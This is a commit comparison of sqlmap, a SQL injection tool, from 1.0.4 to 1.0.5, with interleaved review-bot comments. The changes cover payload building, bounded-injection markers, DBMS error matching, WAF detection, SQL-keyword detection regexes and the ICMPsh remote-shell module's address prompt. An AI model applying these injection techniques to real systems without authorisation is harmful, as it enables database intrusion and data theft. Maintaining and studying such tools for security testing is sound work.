Compare commits


26 Commits
1.0.4 ... 1.0.5

Author SHA1 Message Date
Miroslav Stampar
d7f0b3566d Automatic monthly tagging 2016-05-02 10:06:30 +02:00
Miroslav Stampar
0c67a90cc0 Minor bug fix 2016-05-02 10:06:30 +02:00
Miroslav Stampar
f06e498fb0 Implementation for an Issue #1826 2016-04-29 14:19:32 +02:00
Miroslav Stampar
ad612bf9e4 Patch for Windows banner display 2016-04-29 00:51:20 +02:00
Miroslav Stampar
9dd5cd8eb6 Removing CloudFlare check 2016-04-29 00:17:07 +02:00
Miroslav Stampar
5ed3cdc819 Minor update 2016-04-22 10:54:55 +02:00
Miroslav Stampar
e07c92bce5 Minor change on banner showing up 2016-04-19 13:45:49 +02:00
Miroslav Stampar
0c5965c7b8 Minor patches 2016-04-19 13:13:37 +02:00
Miroslav Stampar
aa21550712 Minor patch for integer casting heuristics (circumvent auto-casting by DBMS itself) 2016-04-15 13:47:19 +02:00
Miroslav Stampar
66061e8c5f Fixes #1811 2016-04-15 12:04:54 +02:00
Miroslav Stampar
c4b74c2e01 Fixes #1810 2016-04-12 22:37:14 +02:00
Miroslav Stampar
55b23e78ee Fixes #1809 2016-04-12 22:10:26 +02:00
Miroslav Stampar
a9526bda92 Minor patch 2016-04-11 22:38:44 +02:00
Miroslav Stampar
0901da3f83 Update for an Issue #1807 2016-04-11 09:43:50 +02:00
Miroslav Stampar
8004652f7b Some more optimization 2016-04-08 15:30:25 +02:00
Miroslav Stampar
c9b410c97f Minor update 2016-04-08 14:59:52 +02:00
Miroslav Stampar
814d710320 Minor speed up 2016-04-08 14:41:34 +02:00
Miroslav Stampar
38fcc5a35a Update for pre-WHERE payloads 2016-04-08 13:19:42 +02:00
Miroslav Stampar
674d516f3e Minor patch 2016-04-08 11:40:09 +02:00
Miroslav Stampar
8ceb4907a5 Another update for Issue #1800 2016-04-08 11:37:38 +02:00
Miroslav Stampar
ce3749622a Minor revisit of payload boundaries (Issue #1800) 2016-04-08 11:28:17 +02:00
Miroslav Stampar
bcfae99701 Adding new WAF script 2016-04-08 10:32:18 +02:00
Miroslav Stampar
44c1c2c6f0 Minor update (reported via email) 2016-04-06 11:43:53 +02:00
Miroslav Stampar
ac08db82b2 Including one more error regex (based on testasp[.]vulnweb[.]com) 2016-04-04 16:14:30 +02:00
Miroslav Stampar
305bfd9d30 Implements #1763 2016-04-04 13:50:10 +02:00
Miroslav Stampar
f9aaec7b4a Minor patch (binary extensions) 2016-04-04 12:43:53 +02:00
34 changed files with 358 additions and 291 deletions


@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
import copy
import httplib
import random
import re
import socket
import time
@@ -62,7 +63,6 @@ from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import CLOUDFLARE_SERVER_HEADER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import DUMMY_NON_SQLI_CHECK_APPENDIX
from lib.core.settings import FORMAT_EXCEPTION_STRINGS
@@ -906,7 +906,7 @@ def heuristicCheckSqlInjection(place, parameter):
if not result:
randStr = randomStr()
payload = "%s%s%s" % (prefix, "%s%s" % (origValue, randStr), suffix)
payload = "%s%s%s" % (prefix, "%s.%d%s" % (origValue, random.randint(1, 9), randStr), suffix)
payload = agent.payload(place, parameter, newValue=payload, where=PAYLOAD.WHERE.REPLACE)
casting = Request.queryPage(payload, place, raise404=False)
@@ -1383,10 +1383,6 @@ def checkConnection(suppressOutput=False):
else:
kb.errorIsNone = True
if headers and headers.get("Server", "") == CLOUDFLARE_SERVER_HEADER:
warnMsg = "CloudFlare response detected"
logger.warn(warnMsg)
except SqlmapConnectionException, ex:
if conf.ipv6:
warnMsg = "check connection to a provided "


@@ -521,7 +521,7 @@ def start():
injection = checkSqlInjection(place, parameter, value)
proceed = not kb.endDetection
if injection is not None and injection.place is not None:
if getattr(injection, "place", None) is not None:
kb.injections.append(injection)
# In case when user wants to end detection phase (Ctrl+C)


@@ -35,10 +35,12 @@ from lib.core.enums import PLACE
from lib.core.enums import POST_HINT
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BOUNDARY_BACKSLASH_MARKER
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DEFAULT_COOKIE_DELIMITER
from lib.core.settings import DEFAULT_GET_POST_DELIMITER
from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.unescaper import unescaper
@@ -95,9 +97,12 @@ class Agent(object):
paramDict = conf.paramDict[place]
origValue = getUnicode(paramDict[parameter])
if place == PLACE.URI:
if place == PLACE.URI or BOUNDED_INJECTION_MARKER in origValue:
paramString = origValue
if place == PLACE.URI:
origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0]
else:
origValue = re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)
origValue = origValue[origValue.rfind('/') + 1:]
for char in ('?', '=', ':'):
if char in origValue:
@@ -161,6 +166,9 @@ class Agent(object):
newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER)
retVal = paramString.replace(_, self.addPayloadDelimiters(newValue))
retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR)
elif BOUNDED_INJECTION_MARKER in paramDict[parameter]:
_ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER)
retVal = "%s=%s" % (parameter, paramString.replace(_, self.addPayloadDelimiters(newValue)))
elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST):
retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
else:
@@ -273,7 +281,7 @@ class Agent(object):
where = kb.injection.data[kb.technique].where if where is None else where
comment = kb.injection.data[kb.technique].comment if comment is None else comment
if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT:
if Backend.getIdentifiedDbms() == DBMS.ACCESS and "--" in (comment or ""):
comment = queries[DBMS.ACCESS].comment.query
if comment is not None:
@@ -296,7 +304,7 @@ class Agent(object):
_ = (
("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
("[HASH_REPLACE]", kb.chars.hash_),
("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT)
)
payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
@@ -747,6 +755,9 @@ class Agent(object):
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
position = 0
char = NULL
for element in xrange(0, count):
if element > 0:
unionQuery += ','
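Review bot: In the new `else` branch, `re.search(r"\w+\Z", origValue.split(BOUNDED_INJECTION_MARKER)[0]).group(0)` dereferences the match without a None check, so a value whose text before the marker does not end in a word character would raise AttributeError. The regex used in paramToDict to insert the marker appears to guarantee a trailing `\w+`, but that coupling is not stated here. A guard such as `match = re.search(...)` followed by `origValue = match.group(0) if match else ""`, or a comment naming the invariant, would make the assumption explicit. The enclosing method starts and ends outside the hunk.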


@@ -91,6 +91,7 @@ from lib.core.log import LOGGER_HANDLER
from lib.core.optiondict import optDict
from lib.core.settings import BANNER
from lib.core.settings import BOLD_PATTERNS
from lib.core.settings import BOUNDED_INJECTION_MARKER
from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES
from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES
from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK
@@ -151,6 +152,7 @@ from lib.core.threads import getCurrentThreadData
from lib.utils.sqlalchemy import _sqlalchemy
from thirdparty.clientform.clientform import ParseResponse
from thirdparty.clientform.clientform import ParseError
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.magic import magic
from thirdparty.odict.odict import OrderedDict
from thirdparty.termcolor.termcolor import colored
@@ -598,6 +600,17 @@ def paramToDict(place, parameters=None):
warnMsg += "so sqlmap could be able to run properly"
logger.warn(warnMsg)
if place in (PLACE.POST, PLACE.GET):
regex = r"\A([^\w]+.*\w+)([^\w]+)\Z"
match = re.search(regex, testableParameters[parameter])
if match:
_ = re.sub(regex, "\g<1>%s\g<2>" % CUSTOM_INJECTION_MARK_CHAR, testableParameters[parameter])
message = "it appears that provided value for %s parameter '%s' " % (place, parameter)
message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % _
test = readInput(message, default="N")
if test[0] in ("y", "Y"):
testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])
if conf.testParameter and not testableParameters:
paramStr = ", ".join(test for test in conf.testParameter)
@@ -968,7 +981,12 @@ def randomRange(start=0, stop=1000, seed=None):
423
"""
randint = random.WichmannHill(seed).randint if seed is not None else random.randint
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
randint = _.randint
else:
randint = random.randint
return int(randint(start, stop))
@@ -981,7 +999,12 @@ def randomInt(length=4, seed=None):
874254
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
return int("".join(choice(string.digits if _ != 0 else string.digits.replace('0', '')) for _ in xrange(0, length)))
@@ -994,7 +1017,12 @@ def randomStr(length=4, lowercase=False, alphabet=None, seed=None):
'RNvnAv'
"""
choice = random.WichmannHill(seed).choice if seed is not None else random.choice
if seed is not None:
_ = getCurrentThreadData().random
_.seed(seed)
choice = _.choice
else:
choice = random.choice
if alphabet:
retVal = "".join(choice(alphabet) for _ in xrange(0, length))
@@ -1053,9 +1081,14 @@ def banner():
This function prints sqlmap banner with its version
"""
if not any(_ in sys.argv for _ in ("--version", "--pickled-options")):
_ = BANNER
if not getattr(LOGGER_HANDLER, "is_tty", False):
if not getattr(LOGGER_HANDLER, "is_tty", False) or "--disable-coloring" in sys.argv:
_ = re.sub("\033.+?m", "", _)
elif IS_WIN:
coloramainit()
dataToStdout(_, forceOutput=True)
def parsePasswordHash(password):
@@ -3147,14 +3180,6 @@ def intersect(valueA, valueB, lowerCase=False):
return retVal
def cpuThrottle(value):
"""
Does a CPU throttling for lesser CPU consumption
"""
delay = 0.00001 * (value ** 2)
time.sleep(delay)
def removeReflectiveValues(content, payload, suppressWarning=False):
"""
Neutralizes reflective values in a given content based on a payload
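Review bot: The same seed-or-global selection block is now repeated in randomRange, randomInt and randomStr, and in randomInt the name `_` is first bound to the thread-local generator and then reused as the loop variable of the generator expression on the return line. A named local such as `rng = getCurrentThreadData().random` removes the shadowing, and a small private helper that returns the seeded generator would remove the duplication. Since `_.seed(seed)` resets the shared per-thread generator on every seeded call, a one-line comment saying that this is what keeps seeded output reproducible would help the next reader.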


@@ -11,7 +11,6 @@ import pickle
import re
import StringIO
import sys
import types
from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING


@@ -11,7 +11,6 @@ _defaults = {
"csvDel": ",",
"timeSec": 5,
"googlePage": 1,
"cpuThrottle": 5,
"verbose": 1,
"delay": 0,
"timeout": 30,


@@ -151,7 +151,6 @@ from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.colorama.initialise import init as coloramainit
from thirdparty.keepalive import keepalive
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
@@ -2331,10 +2330,6 @@ def _basicOptionValidation():
errMsg = "value for option '--first' (firstChar) must be smaller than or equal to value for --last (lastChar) option"
raise SqlmapSyntaxException(errMsg)
if isinstance(conf.cpuThrottle, int) and (conf.cpuThrottle > 100 or conf.cpuThrottle < 0):
errMsg = "value for option '--cpu-throttle' (cpuThrottle) must be in range [0,100]"
raise SqlmapSyntaxException(errMsg)
if conf.textOnly and conf.nullConnection:
errMsg = "switch '--text-only' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)
@@ -2536,9 +2531,6 @@ def _resolveCrossReferences():
lib.controller.checks.setVerbosity = setVerbosity
def initOptions(inputOptions=AttribDict(), overrideOptions=False):
if IS_WIN:
coloramainit()
_setConfAttributes()
_setKnowledgeBaseAttributes()
_mergeOptions(inputOptions, overrideOptions)


@@ -230,7 +230,6 @@ optDict = {
"disablePrecon": "boolean",
"binaryFields": "string",
"profile": "boolean",
"cpuThrottle": "integer",
"forceDns": "boolean",
"identifyWaf": "boolean",
"skipWaf": "boolean",


@@ -10,7 +10,6 @@ import re
import subprocess
import string
import sys
import time
import types
from lib.core.datatype import AttribDict
@@ -20,7 +19,7 @@ from lib.core.enums import OS
from lib.core.revision import getRevisionNumber
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.0.4.0"
VERSION = "1.0.5.0"
REVISION = getRevisionNumber()
STABLE = VERSION.count('.') <= 2
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
@@ -61,6 +60,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
URI_QUESTION_MARKER = "__QUESTION_MARK__"
ASTERISK_MARKER = "__ASTERISK_MARK__"
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]"
@@ -313,9 +313,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
# Regex used for parsing XML Burp saved history items
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
# Server header in CloudFlare responses
CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
# Encoding used for Unicode data
UNICODE_ENCODING = "utf8"
@@ -448,7 +445,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
# Patterns often seen in HTTP headers containing custom injection marking character
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
@@ -533,7 +530,7 @@ HASHDB_FLUSH_RETRIES = 3
HASHDB_END_TRANSACTION_RETRIES = 3
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
HASHDB_MILESTONE_VALUE = "WVMqopmuzX" # "".join(random.sample(string.ascii_letters, 10))
# Warn user of possible delay due to large page dump in full UNION query injections
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
@@ -578,7 +575,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
# Generic SQL comment formation
GENERIC_SQL_COMMENT = "-- -"
GENERIC_SQL_COMMENT = "-- [RANDSTR]"
# Threshold value for turning back on time auto-adjustment mechanism
VALID_TIME_CHARS_RUN_THRESHOLD = 100
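Review bot: `'DS_Store'` is the only mixed-case entry in the new CRAWL_EXCLUDE_EXTENSIONS tuple; if the crawler lower-cases the URL extension before the membership test (not visible in this section), that entry can never match. Either store it as `'ds_store'` or confirm that the comparison is case-sensitive. A short comment naming where the extension list was taken from would also make future updates easier to check.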


@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
"""
import difflib
import random
import threading
import time
import traceback
@@ -51,6 +52,7 @@ class _ThreadData(threading.local):
self.lastRequestMsg = None
self.lastRequestUID = 0
self.lastRedirectURL = None
self.random = random.WichmannHill()
self.resumed = False
self.retriesCount = 0
self.seqMatcher = difflib.SequenceMatcher(None)


@@ -11,7 +11,6 @@ import zipfile
from lib.core.common import getSafeExString
from lib.core.exception import SqlmapDataException
from lib.core.exception import SqlmapInstallationException
from lib.core.settings import UNICODE_ENCODING
class Wordlist(object):
"""


@@ -763,9 +763,6 @@ def cmdLineParser(argv=None):
parser.add_option("--binary-fields", dest="binaryFields",
help=SUPPRESS_HELP)
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
help=SUPPRESS_HELP)
parser.add_option("--force-dns", dest="forceDns", action="store_true",
help=SUPPRESS_HELP)


@@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
ContentHandler.__init__(self)
self._dbms = None
self._page = page
self._page = (page or "")
self._lower_page = self._page.lower()
self.dbms = None
@@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
def startElement(self, name, attrs):
if self.dbms:
return
if name == "dbms":
self._dbms = attrs.get("value")
elif name == "error":
if re.search(attrs.get("regexp"), self._page, re.I):
regexp = attrs.get("regexp")
if regexp not in kb.cache.regex:
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
keywords = sorted(keywords, key=len)
kb.cache.regex[regexp] = keywords[-1].lower()
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
self.dbms = self._dbms
self._markAsErrorPage()
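Review bot: The keyword prefilter in startElement takes the longest `\w+` run of the pattern and requires it in the lower-cased page before running the regex, which is only sound when that word is mandatory in every match. A pattern with alternation, or with a quantifier on the keyword's last character, would be skipped on pages that match through another branch, so a DBMS error message could be missed. `keywords[-1]` also raises IndexError when the pattern has no word characters; `kb.cache.regex[regexp] = keywords[-1].lower() if keywords else ""` keeps the fall-through to `re.search`. The pattern passed to `re.findall` should be a raw string, `r"\w+"`.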


@@ -150,7 +150,7 @@ def checkCharEncoding(encoding, warn=True):
return encoding
# Reference: http://www.destructor.de/charsets/index.htm
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
for delimiter in (';', ',', '('):
if delimiter in encoding:


@@ -32,7 +32,6 @@ from lib.core.agent import agent
from lib.core.common import asciifyUrl
from lib.core.common import calculateDeltaSeconds
from lib.core.common import clearConsoleLine
from lib.core.common import cpuThrottle
from lib.core.common import dataToStdout
from lib.core.common import evaluateCode
from lib.core.common import extractRegexResult
@@ -220,8 +219,6 @@ class Connect(object):
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
time.sleep(conf.delay)
elif conf.cpuThrottle:
cpuThrottle(conf.cpuThrottle)
if conf.offline:
return None, None, None


@@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
"""
import os
import re
import socket
import time
from extra.icmpsh.icmpsh_m import main as icmpshmaster
@@ -54,15 +56,29 @@ class ICMPsh:
if self.localIP:
message += "[Enter for '%s' (detected)] " % self.localIP
while not address:
address = readInput(message, default=self.localIP)
valid = None
while not valid:
valid = True
address = readInput(message, default=self.localIP or "")
try:
socket.inet_aton(address)
except socket.error:
valid = False
finally:
valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
if conf.batch and not address:
raise SqlmapDataException("local host address is missing")
elif address and not valid:
warnMsg = "invalid local host address"
logger.warn(warnMsg)
return address
def _prepareIngredients(self, encode=True):
self.localIP = getattr(self, "localIP", None)
self.remoteIP = getattr(self, "remoteIP", None)
self.lhostStr = ICMPsh._selectLhost(self)
self.rhostStr = ICMPsh._selectRhost(self)
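Review bot: The dotted-quad check in the new address loop uses `re.search` without anchors, so it accepts any string that merely contains four dot-separated digit groups; anchoring it, `re.match(r"\A\d+\.\d+\.\d+\.\d+\Z", address)`, makes the validation exact. Computing `valid` inside `finally` hides the control flow, and a plain statement after the `try`/`except` does the same job. With `conf.batch` set and a non-empty but invalid default, the loop appears to re-prompt indefinitely, because only the empty-address case raises SqlmapDataException.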


@@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import re
import threading
import time
from extra.safe2bin.safe2bin import safechardecode
from extra.safe2bin.safe2bin import safecharencode
from lib.core.agent import agent
from lib.core.common import Backend
@@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
from lib.core.common import filterControlChars
from lib.core.common import getCharset
from lib.core.common import getCounter
from lib.core.common import getUnicode
from lib.core.common import goGoodSamaritan
from lib.core.common import getPartRun
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import incrementCounter
from lib.core.common import randomInt
from lib.core.common import safeStringFormat
from lib.core.common import singleTimeWarnMessage
from lib.core.data import conf
@@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
from lib.core.settings import INFERENCE_GREATER_CHAR
from lib.core.settings import INFERENCE_EQUALS_CHAR
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import MAX_BISECTION_LENGTH
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
from lib.core.settings import NULL


@@ -45,6 +45,7 @@ from lib.core.common import dataToStdout
from lib.core.common import getFileItems
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import getUnicode
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.common import normalizeUnicode
@@ -490,7 +491,7 @@ def attackDumpedTable():
for (_, hash_, password) in results:
if hash_:
lut[hash_.lower()] = password
lut[hash_.lower()] = getUnicode(password)
infoMsg = "postprocessing table dump"
logger.info(infoMsg)


@@ -66,7 +66,7 @@ class HashDB(object):
@staticmethod
def hashKey(key):
key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400
return retVal
def retrieve(self, key, unserialize=False):


@@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import cookielib
import httplib
import re
import socket
@@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
from lib.core.enums import REDIRECTION
from lib.core.exception import SqlmapBaseException
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapUserQuitException
from lib.core.settings import DUMMY_SEARCH_USER_AGENT
from lib.core.settings import DUCKDUCKGO_REGEX
@@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler
from thirdparty.socks import socks


@@ -572,7 +572,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
logger.info(infoMsg)
else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments"
@@ -702,7 +706,11 @@ class Databases:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
else:
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
if not isNoneValue(comment):
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
logger.info(infoMsg)
else:
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
warnMsg += "possible to get column comments"


@@ -85,6 +85,7 @@ def main():
raise SystemExit
setPaths()
banner()
# Store original command line options for possible later restoration
cmdLineOptions.update(cmdLineParser().__dict__)
@@ -97,8 +98,6 @@ def main():
sys.stderr = StdDbOut(conf.taskid, messagetype="stderr")
setRestAPILog()
banner()
conf.showTime = True
dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True)
dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True)


@@ -5,10 +5,8 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import os
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGH


@@ -5,10 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import base64
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOWEST


@@ -21,13 +21,15 @@ def reset_all():
def init(autoreset=False, convert=None, strip=None, wrap=True):
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
if orig_stdout is not None:
return
if not wrap and any([autoreset, convert, strip]):
raise ValueError('wrap=False conflicts with any other arg=True')
global wrapped_stdout, wrapped_stderr
global orig_stdout, orig_stderr
orig_stdout = sys.stdout
orig_stderr = sys.stderr
@@ -49,10 +51,15 @@ def init(autoreset=False, convert=None, strip=None, wrap=True):
def deinit():
global orig_stdout
global orig_stderr
if orig_stdout is not None:
sys.stdout = orig_stdout
orig_stdout = None
if orig_stderr is not None:
sys.stderr = orig_stderr
orig_stderr = None
@contextlib.contextmanager


@@ -18,7 +18,7 @@ def detect(get_page):
for vector in WAF_ATTACK_VECTORS:
_, headers, _ = get_page(get=vector)
retval = re.search(r"fhl", headers.get("X-Server", ""), re.I) is not None
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER), re.I) is not None
retval |= re.search(r"yunjiasu-nginx", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None
if retval:
break

24
waf/nsfocus.py Normal file

@@ -0,0 +1,24 @@
#!/usr/bin/env python
"""
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
